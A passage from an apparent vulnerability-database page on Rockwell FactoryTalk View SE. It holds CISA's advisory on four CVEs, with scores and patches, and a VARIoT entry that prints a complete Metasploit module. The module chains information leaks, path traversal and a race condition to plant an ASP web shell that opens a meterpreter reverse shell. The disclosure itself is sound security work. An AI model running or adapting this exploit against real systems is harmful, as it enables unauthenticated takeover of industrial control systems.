          "text": "After bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution.CVE-2020-12031 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12031"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "mitigation",
          "details": "For CVE-2020-12031 Rockwell Automation recommends applying patch 1126290. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 - Patch Roll-up for CPR9 SRx.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12028",
      "cwe": {
        "id": "CWE-285",
        "name": "Improper Authorization"
      },
      "notes": [
        {
          "category": "summary",
          "text": "A remote, authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions.CVE-2020-12028 has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12028"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "vendor_fix",
          "details": "For CVE-2020-12028 and CVE-2020-12027 Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12027",
      "cwe": {
        "id": "CWE-200",
        "name": "Exposure of Sensitive Information to an Unauthorized Actor"
      },
      "notes": [
        {
          "category": "summary",
          "text": "The affected product discloses the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts.CVE-2020-12027 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12027"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "vendor_fix",
          "details": "For CVE-2020-12028 and CVE-2020-12027 Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    }
  ]
}

icsa-20-170-05

Vulnerability from csaf_cisa

Published

2020-06-18 00:00

Modified

2020-06-18 00:00

Summary

Rockwell Automation FactoryTalk View SE

Notes

CISA Disclaimer

This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov

Legal Notice

Risk evaluation

Successful exploitation of these vulnerabilities may allow a remote authenticated attacker to manipulate data of affected devices.

Critical infrastructure sectors

Chemical, Commercial Facilities, Critical Manufacturing, Energy, Government Facilities, Water and Wastewater Systems

Countries/areas deployed

Worldwide

Company headquarters location

United States

Recommended Practices

CISA also recommends users take the following measures to protect themselves from social engineering attacks:

Exploitability

No known public exploits specifically target these vulnerabilities.

JSON

To clipboard

{
  "document": {
    "acknowledgments": [
      {
        "organization": "Rockwell Automation",
        "summary": "reporting these vulnerabilities to CISA"
      },
      {
        "organization": "Trend Micro \u0027s Zero Day Initiative",
        "summary": "reporting these vulnerabilities to CISA"
      }
    ],
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Disclosure is not limited",
      "tlp": {
        "label": "WHITE",
        "url": "https://us-cert.cisa.gov/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
        "title": "CISA Disclaimer"
      },
      {
        "category": "legal_disclaimer",
        "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
        "title": "Legal Notice"
      },
      {
        "category": "summary",
        "text": "Successful exploitation of these vulnerabilities may allow a remote authenticated attacker to manipulate data of affected devices.",
        "title": "Risk evaluation"
      },
      {
        "category": "other",
        "text": "Chemical, Commercial Facilities, Critical Manufacturing, Energy, Government Facilities, Water and Wastewater Systems",
        "title": "Critical infrastructure sectors"
      },
      {
        "category": "other",
        "text": "Worldwide",
        "title": "Countries/areas deployed"
      },
      {
        "category": "other",
        "text": "United States",
        "title": "Company headquarters location"
      },
      {
        "category": "general",
        "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA also recommends users take the following measures to protect themselves from social engineering attacks:",
        "title": "Recommended Practices"
      },
      {
        "category": "other",
        "text": "No known public exploits specifically target these vulnerabilities.",
        "title": "Exploitability"
      }
    ],
    "publisher": {
      "category": "coordinator",
      "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870",
      "name": "CISA",
      "namespace": "https://www.cisa.gov/"
    },
    "references": [
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-20-170-05 JSON",
        "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2020/icsa-20-170-05.json"
      },
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-20-170-05 Web Version",
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-20-170-05"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ncas/tips/ST04-014"
      }
    ],
    "title": "Rockwell Automation FactoryTalk View SE",
    "tracking": {
      "current_release_date": "2020-06-18T00:00:00.000000Z",
      "generator": {
        "engine": {
          "name": "CISA CSAF Generator",
          "version": "1.0.0"
        }
      },
      "id": "ICSA-20-170-05",
      "initial_release_date": "2020-06-18T00:00:00.000000Z",
      "revision_history": [
        {
          "date": "2020-06-18T00:00:00.000000Z",
          "legacy_version": "Initial",
          "number": "1",
          "summary": "Publication Date"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "vers:all/*",
                "product": {
                  "name": " FactoryTalk View SE: All versions",
                  "product_id": "CSAFPID-0001"
                }
              }
            ],
            "category": "product_name",
            "name": "FactoryTalk View SE"
          }
        ],
        "category": "vendor",
        "name": "Rockwell Automation"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2020-12029",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "summary",
          "text": "The affected product does not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE).CVE-2020-12029 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been assigned; the CVSS vector string is (AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12029"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "mitigation",
          "details": "For CVE-2020-12029 Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 - Patch Roll-up for CPR9 SRx.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12031",
      "cwe": {
        "id": "CWE-119",
        "name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
      },
      "notes": [
        {
          "category": "summary",
          "text": "After bypassing memory corruption mechanisms found in the operating system, a local, authenticated attacker may corrupt the associated memory space allowing for arbitrary code execution.CVE-2020-12031 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is (AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12031"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "mitigation",
          "details": "For CVE-2020-12031 Rockwell Automation recommends applying patch 1126290. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 - Patch Roll-up for CPR9 SRx.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12028",
      "cwe": {
        "id": "CWE-285",
        "name": "Improper Authorization"
      },
      "notes": [
        {
          "category": "summary",
          "text": "A remote, authenticated attacker may be able to utilize certain handlers to interact with the data on the remote endpoint since those handlers do not enforce appropriate permissions.CVE-2020-12028 has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12028"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "vendor_fix",
          "details": "For CVE-2020-12028 and CVE-2020-12027 Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2020-12027",
      "cwe": {
        "id": "CWE-200",
        "name": "Exposure of Sensitive Information to an Unauthorized Actor"
      },
      "notes": [
        {
          "category": "summary",
          "text": "The affected product discloses the hostnames and file paths for certain files within the system. A remote, authenticated attacker may be able to leverage this information for reconnaissance efforts.CVE-2020-12027 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12027"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u0027s published guidelines in their security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
        },
        {
          "category": "vendor_fix",
          "details": "For CVE-2020-12028 and CVE-2020-12027 Rockwell Automation recommends enabling built in security features found within FactoryTalk View SE. Users should follow guidance found in knowledge base articles 109056 and 1126943 to set up IPSec and/or HTTPs.",
          "product_ids": [
            "CSAFPID-0001"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    }
  ]
}

var-202007-0195

Vulnerability from variot

All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 – Patch Roll-up for CPR9 SRx. FactoryTalk View SE There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of project files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. ##

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient

def initialize(info = {}) super( update_info( info, 'Name' => 'Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution on the Rockwell FactoryTalk View SE SCADA product as the IIS user. The attack relies on the chaining of five separate vulnerabilities. In order to achieve full remote code execution on all targets, two information leak vulnerabilities are also abused. This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro ', # Vulnerability discovery and Metasploit module 'Radek Domanski ' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'URL', 'https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami'], [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md'], [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md'], [ 'CVE', '2020-12027'], [ 'CVE', '2020-12028'], [ 'CVE', '2020-12029'], [ 'ZDI', '20-727'], [ 'ZDI', '20-728'], [ 'ZDI', '20-729'], [ 'ZDI', '20-730'], ], 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Payload' => { 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' } }, 'DefaultOptions' => { 'WfsDelay' => 20 }, 'Targets' => [ [ 'Rockwell Automation FactoryTalk SE', {} ] ], 'DisclosureDate' => '2020-06-22', 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(80), OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']), OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]), OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/']) ] )

register_advanced_options(
  [
    OptInt.new('SLEEP_RACER', [true, 'Number of seconds to wait for racer thread to finish', 15]),
  ]
)

end

def send_to_factory(path) send_request_cgi({ 'uri' => normalize_uri(target_uri, path), 'method' => 'GET' }) end

def check res = send_to_factory('/hmi_isapi.dll') return Exploit::CheckCode::Safe unless res && res.code == 200

# Parse version from response body
# Example: Version 11.00.00.230
version = res.body.scan(/Version ([0-9\.]{5,})/).flatten.first.to_s.split('.')

# Is returned version sound?
unless version.empty?
  if version.length != 4
    return Exploit::CheckCode::Detected
  end

  print_status("#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join('.')}")
  if version[0].to_i == 11 && version[1].to_i == 0 && version[2].to_i == 0 && version[3].to_i == 230
    # we know this exact version is vulnerable (11.00.00.230)
    return Exploit::CheckCode::Appears
  end

  return Exploit::CheckCode::Detected
end

return Exploit::CheckCode::Unknown

end

def on_request_uri(cli, request) if request.uri.include?(@shelly) print_good("#{peer} - Target connected, sending payload") psh = cmd_psh_payload( payload.encoded, payload.arch.first # without comspec it seems to fail, so keep it this way # remove_comspec: true ) # add double quotes for classic ASP escaping psh.gsub!('"', '""')

  # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell
  # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn't seem to work anymore... 
  # If this module is not working on an older Windows version, try the below as payload:
  # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)
  payload = %{<%CreateObject("WScript.Shell").exec("#{psh}")%>}
  send_response(cli, payload)
  # payload file is deleted automatically by the server once we win the race!

elsif request.uri.include?(@proj_name)
  # Directory traversal: vulnerable asp file will land in the path we provide
  print_good("#{peer} - Target connected, sending file path with dir traversal")
  # Check the comments in the Infoleak 2 (project installation path) to understand why
  filename = "../SE/HMI Projects/#{@shelly}"
  send_response(cli, filename)
end

end

def exploit # Infoleak 1 (project listing) print_status("#{peer} - Listing projects on the server") res = send_to_factory('/hmi_isapi.dll?GetHMIProjects')

fail_with(Failure::UnexpectedReply, 'Failed to obtain project list. Bailing') unless
  res && res.code == 200 && res.body.include?('HMIProject')

print_status("#{peer} - Received list of projects from the server")
@proj_name = nil
proj_path = ''
xml = res.get_xml_document

# Parse XML project list and check each project for installation project path
xml.search('HMIProject').each do |project|
  # Infoleak 2 (project installation path)
  # In the original exploit, we used this to calculate the directory traversal path, but
  # Google says the path is the same for all versions since at least 2007. 
  # Let's still abuse it to check if the project is valid. 
  url = "/hmi_isapi.dll?GetHMIProjectPath&#{project.attributes['Name']}"
  res = send_to_factory(url)

  proj_path = res.body.strip

  # Check if response contains :\ that indicates a windows path
  next unless proj_path.include?(':\\')

  print_status("#{peer} - Found project path: #{proj_path}")

  # We only need first hit so we can quit the project parsing once we get it
  if project.attributes['Name']
    @proj_name = project.attributes['Name']
    break
  end
end

if !@proj_name
  fail_with(Failure::UnexpectedReply, 'Failed to get a path from the XML to drop our shell, bailing out...')
end

shell_path = proj_path.sub(@proj_name, '').strip
print_good("#{peer} - Got a path to drop our shell: #{shell_path}")

# Start http server for project copy callback
http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
print_status("#{peer} - Starting up our web service on #{http_service} ...")

start_service({ 'Uri' => {
  'Proc' => proc do |cli, req|
    on_request_uri(cli, req)
  end,
  # This path has to be capitalized as "RSViewSE" or else the exploit will fail!
  'Path' => '/RSViewSE/'
} })

# Race Condition
# This is the racer thread. It will continuously access our asp file until it gets executed
print_status("#{peer} - Starting racer thread, let's win this race condition!")
@shelly = "#{rand_text_alpha(5..10)}.asp"
racer = Thread.new do
  loop do
    res = send_to_factory("/#{@shelly}")
    if res.code == 200
      print_good("#{peer} - We've won the race condition, shell incoming!")
      break
    end
  end
end

# Project Copy Request: target will connect to us to obtain project information. 
print_status("#{peer} - Initiating project copy request...")
url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
res = send_to_factory(url)

# wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish
count = 0
while count < datastore['SLEEP_RACER']
  break if racer.status == false

  sleep(1)
  count += 1
end
racer.exit

end end

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202007-0195",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "factorytalk view",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "rockwellautomation",
        "version": null
      },
      {
        "model": "factorytalk view",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "rockwell automation",
        "version": "se"
      },
      {
        "model": "factorytalk view se",
        "scope": null,
        "trust": 0.7,
        "vendor": "rockwell automation",
        "version": null
      },
      {
        "model": "automation factorytalk view se",
        "scope": null,
        "trust": 0.6,
        "vendor": "rockwell",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:rockwellautomation:factorytalk_view",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Team FLASHBACK: Pedro Ribeiro (pedrib@gmail.com|@pedrib1337) and Radek Domanski (@RabbitPro)",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2020-12029",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
